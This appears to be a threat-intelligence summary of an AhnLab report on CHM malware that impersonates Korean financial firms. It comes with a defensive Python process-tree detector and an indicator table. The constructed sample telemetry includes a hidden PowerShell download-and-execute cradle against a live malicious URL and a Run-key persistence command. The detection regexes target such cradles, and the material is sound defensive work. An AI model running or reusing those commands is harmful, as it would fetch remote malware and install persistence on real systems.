Detection of Changes in CHM Malware Distribution
2023-08-02 • Ahnlab • Detection of changes in CHM malware distribution
ASEC described week-to-week changes in CHM (Compiled HTML Help) malware distributed with lures impersonating South Korean financial companies and insurers. Earlier variants opened the CHM with hh.exe, decompiled the embedded HTML, wrote a .jse script to disk, and ran it with wscript.exe, which in turn invoked PowerShell to download and execute additional code; persistence was kept through a Run registry key. A later variant branched its behavior depending on whether AhnLab software was installed on the host, and a second variant dropped and executed a .NET backdoor directly, giving the operators reverse-connection access rather than only information theft. The report lists EDR detection names, malware classifications, file hashes, and the atusay.lat and zienk.sbs URLs for defenders tracking the evolving CHM execution chains.
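The execution chain above (hh.exe, a .jse run by wscript.exe, a PowerShell download cradle, Run-key persistence) is what a process-tree detection should key on rather than the individual file hashes, which changed weekly. The following is an added example, not code from the ASEC post: it walks constructed process-creation events (the field layout and sample command lines are assumptions, modelled on Sysmon EID 1 / EDR telemetry) and flags script hosts descended from hh.exe, download cradles under that lineage, Run-key writes, and command lines that reference the domains from the indicator table. The decompile step and the file paths are illustrative; the real CHM's internal layout is not described on this page.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (assumed shape; map Sysmon EID 1 / EDR fields onto it)."""
    pid: int
    ppid: int
    image: str      # lowercase base name of the executable, e.g. "hh.exe"
    cmdline: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Domains taken from the indicator table on this page; URL paths are left out because they rotate.
IOC_DOMAINS = {"atusay.lat", "zienk.sbs"}
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\b", re.I)
URL_HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)

def lineage(ev, by_pid):
    """Return [parent, grandparent, ...] for ev, guarding against pid reuse cycles."""
    seen, chain = {ev.pid}, []
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain

def detect(events):
    """Return (rule, pid, detail) tuples for events matching the CHM chain described above."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        anc = lineage(e, by_pid)
        chain = " -> ".join(a.image for a in reversed(anc) if True) + " -> " + e.image
        under_hh = any(a.image == "hh.exe" for a in anc)
        if e.image in SCRIPT_HOSTS and under_hh:
            findings.append(("chm_spawns_script_host", e.pid, chain))
        # A download cradle is only tied to this rule when it descends from hh.exe,
        # so ordinary admin PowerShell does not fire it.
        if e.image in SCRIPT_HOSTS and under_hh and DOWNLOAD_RE.search(e.cmdline):
            findings.append(("script_host_download_cradle", e.pid, chain))
        if e.image in SCRIPT_HOSTS | {"reg.exe"} and RUN_KEY_RE.search(e.cmdline):
            findings.append(("run_key_persistence", e.pid, chain))
        for host in URL_HOST_RE.findall(e.cmdline):
            if host.lower() in IOC_DOMAINS:
                findings.append(("ioc_domain_in_cmdline", e.pid, host.lower()))
    return findings

# Constructed sample telemetry: one CHM chain plus two benign processes for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "explorer.exe",   r"C:\Windows\explorer.exe"),
    ProcEvent(200, 100, "hh.exe",         r"hh.exe C:\Users\kim\Downloads\statement.chm"),
    ProcEvent(210, 200, "hh.exe",         r"hh.exe -decompile C:\Users\kim\AppData\Local\Temp C:\Users\kim\Downloads\statement.chm"),
    ProcEvent(220, 210, "wscript.exe",    r"wscript.exe C:\Users\kim\AppData\Local\Temp\update.jse"),
    ProcEvent(230, 220, "powershell.exe",
              r'''powershell.exe -windowstyle hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://atusay.lat/kxydo')"'''),
    ProcEvent(240, 230, "reg.exe",
              r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpdate /t REG_SZ /d "wscript.exe C:\Users\kim\AppData\Local\Temp\update.jse" /f'),
    ProcEvent(300, 100, "hh.exe",         r"hh.exe C:\Program Files\Tool\manual.chm"),   # benign help file
    ProcEvent(310, 100, "powershell.exe", r"powershell.exe -c Get-ChildItem"),            # benign admin use
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid} {detail}")
```

The benign hh.exe that opens a help file and never spawns a script host produces nothing, which is the point of keying on lineage instead of on hh.exe alone. On a real host, pid reuse and missing parent events are the usual sources of broken chains, so feed the detector a window of events that includes the parents, not just the suspicious child.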
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| URL | https://atusay.lat/kxydo | 2023-07-20 | 2023-08-30 |
| DOMAIN | atusay.lat | 2023-07-20 | 2023-08-30 |
| HASH | 790c5f50942a502252a00b9878db9496 | 2023-08-02 | 2023-08-09 |
| HASH | 8d39335e67e797ad66c3953c3d6203ce | 2023-08-02 | 2023-08-09 |
| HASH | 7c949f375c56e7de7a3c4f0a9a19c4e5 | 2023-08-02 | 2023-08-09 |
| HASH | 258472c79fc3b9360ad560e26350b756 | 2023-08-02 | 2023-08-09 |
| HASH | 056932151e3cc526ebf4ef5cf86ae0b4 | 2023-08-02 | 2023-08-09 |
| URL | https://zienk.sbs/kjntf | 2023-08-02 | 2023-08-09 |
| DOMAIN | zienk.sbs | 2023-08-02 | 2023-08-09 |